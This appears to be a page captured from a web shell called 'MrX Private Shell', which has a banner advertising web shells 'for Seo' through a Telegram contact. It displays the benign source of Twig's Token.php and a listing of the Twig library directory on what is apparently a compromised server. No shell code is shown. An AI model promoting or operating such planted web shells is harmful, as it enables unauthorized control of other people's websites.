__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * (c) Armin Ronacher * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig; /** * @author Fabien Potencier <[email protected]> */ final class Token { public const EOF_TYPE = -1; public const TEXT_TYPE = 0; public const BLOCK_START_TYPE = 1; public const VAR_START_TYPE = 2; public const BLOCK_END_TYPE = 3; public const VAR_END_TYPE = 4; public const NAME_TYPE = 5; public const NUMBER_TYPE = 6; public const STRING_TYPE = 7; public const OPERATOR_TYPE = 8; public const PUNCTUATION_TYPE = 9; public const INTERPOLATION_START_TYPE = 10; public const INTERPOLATION_END_TYPE = 11; public const ARROW_TYPE = 12; public const SPREAD_TYPE = 13; public function __construct( private int $type, private $value, private int $lineno, ) { } public function __toString(): string { return \sprintf('%s(%s)', self::typeToString($this->type, true), $this->value); } /** * Tests the current token for a type and/or a value. * * Parameters may be: * * just type * * type and value (or array of possible values) * * just value (or array of possible values) (NAME_TYPE is used as type) * * @param array|string|int $type The type to test * @param array|string|null $values The token value */ public function test($type, $values = null): bool { if (null === $values && !\is_int($type)) { $values = $type; $type = self::NAME_TYPE; } return ($this->type === $type) && ( null === $values || (\is_array($values) && \in_array($this->value, $values)) || $this->value == $values ); } public function getLine(): int { return $this->lineno; } /** * @deprecated since Twig 3.19 */ public function getType(): int { trigger_deprecation('twig/twig', '3.19', \sprintf('The "%s()" method is deprecated.', __METHOD__)); return $this->type; } /** * @return mixed */ public function getValue() { return $this->value; } public function toEnglish(): string { return self::typeToEnglish($this->type); } public static function typeToString(int $type, bool $short = false): string { switch ($type) { case self::EOF_TYPE: $name = 'EOF_TYPE'; break; case self::TEXT_TYPE: $name = 'TEXT_TYPE'; break; case self::BLOCK_START_TYPE: $name = 'BLOCK_START_TYPE'; break; case self::VAR_START_TYPE: $name = 'VAR_START_TYPE'; break; case self::BLOCK_END_TYPE: $name = 'BLOCK_END_TYPE'; break; case self::VAR_END_TYPE: $name = 'VAR_END_TYPE'; break; case self::NAME_TYPE: $name = 'NAME_TYPE'; break; case self::NUMBER_TYPE: $name = 'NUMBER_TYPE'; break; case self::STRING_TYPE: $name = 'STRING_TYPE'; break; case self::OPERATOR_TYPE: $name = 'OPERATOR_TYPE'; break; case self::PUNCTUATION_TYPE: $name = 'PUNCTUATION_TYPE'; break; case self::INTERPOLATION_START_TYPE: $name = 'INTERPOLATION_START_TYPE'; break; case self::INTERPOLATION_END_TYPE: $name = 'INTERPOLATION_END_TYPE'; break; case self::ARROW_TYPE: $name = 'ARROW_TYPE'; break; case self::SPREAD_TYPE: $name = 'SPREAD_TYPE'; break; default: throw new \LogicException(\sprintf('Token of type "%s" does not exist.', $type)); } return $short ? $name : 'Twig\Token::'.$name; } public static function typeToEnglish(int $type): string { switch ($type) { case self::EOF_TYPE: return 'end of template'; case self::TEXT_TYPE: return 'text'; case self::BLOCK_START_TYPE: return 'begin of statement block'; case self::VAR_START_TYPE: return 'begin of print statement'; case self::BLOCK_END_TYPE: return 'end of statement block'; case self::VAR_END_TYPE: return 'end of print statement'; case self::NAME_TYPE: return 'name'; case self::NUMBER_TYPE: return 'number'; case self::STRING_TYPE: return 'string'; case self::OPERATOR_TYPE: return 'operator'; case self::PUNCTUATION_TYPE: return 'punctuation'; case self::INTERPOLATION_START_TYPE: return 'begin of string interpolation'; case self::INTERPOLATION_END_TYPE: return 'end of string interpolation'; case self::ARROW_TYPE: return 'arrow function'; case self::SPREAD_TYPE: return 'spread operator'; default: throw new \LogicException(\sprintf('Token of type "%s" does not exist.', $type)); } } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Attribute | Folder | 0755 |
|
|
| Cache | Folder | 0755 |
|
|
| Error | Folder | 0755 |
|
|
| Extension | Folder | 0755 |
|
|
| Loader | Folder | 0755 |
|
|
| Node | Folder | 0755 |
|
|
| NodeVisitor | Folder | 0755 |
|
|
| Profiler | Folder | 0755 |
|
|
| Resources | Folder | 0755 |
|
|
| Runtime | Folder | 0755 |
|
|
| RuntimeLoader | Folder | 0755 |
|
|
| Sandbox | Folder | 0755 |
|
|
| Test | Folder | 0755 |
|
|
| TokenParser | Folder | 0755 |
|
|
| Util | Folder | 0755 |
|
|
| AbstractTwigCallable.php | File | 5.36 KB | 0644 |
|
| Compiler.php | File | 6.17 KB | 0644 |
|
| DeprecatedCallableInfo.php | File | 1.64 KB | 0644 |
|
| Environment.php | File | 27.54 KB | 0644 |
|
| ExpressionParser.php | File | 40.02 KB | 0644 |
|
| ExtensionSet.php | File | 14.3 KB | 0644 |
|
| FileExtensionEscapingStrategy.php | File | 1.43 KB | 0644 |
|
| Lexer.php | File | 22.38 KB | 0644 |
|
| Markup.php | File | 1.03 KB | 0644 |
|
| NodeTraverser.php | File | 1.78 KB | 0644 |
|
| OperatorPrecedenceChange.php | File | 778 B | 0644 |
|
| Parser.php | File | 14.38 KB | 0644 |
|
| Source.php | File | 929 B | 0644 |
|
| Template.php | File | 15.67 KB | 0644 |
|
| TemplateWrapper.php | File | 2.56 KB | 0644 |
|
| Token.php | File | 5.58 KB | 0644 |
|
| TokenStream.php | File | 3.5 KB | 0644 |
|
| TwigCallableInterface.php | File | 1.17 KB | 0644 |
|
| TwigFilter.php | File | 1.84 KB | 0644 |
|
| TwigFunction.php | File | 1.58 KB | 0644 |
|
| TwigTest.php | File | 1.53 KB | 0644 |
|
| autoload.php | File | 20.42 KB | 0644 |
|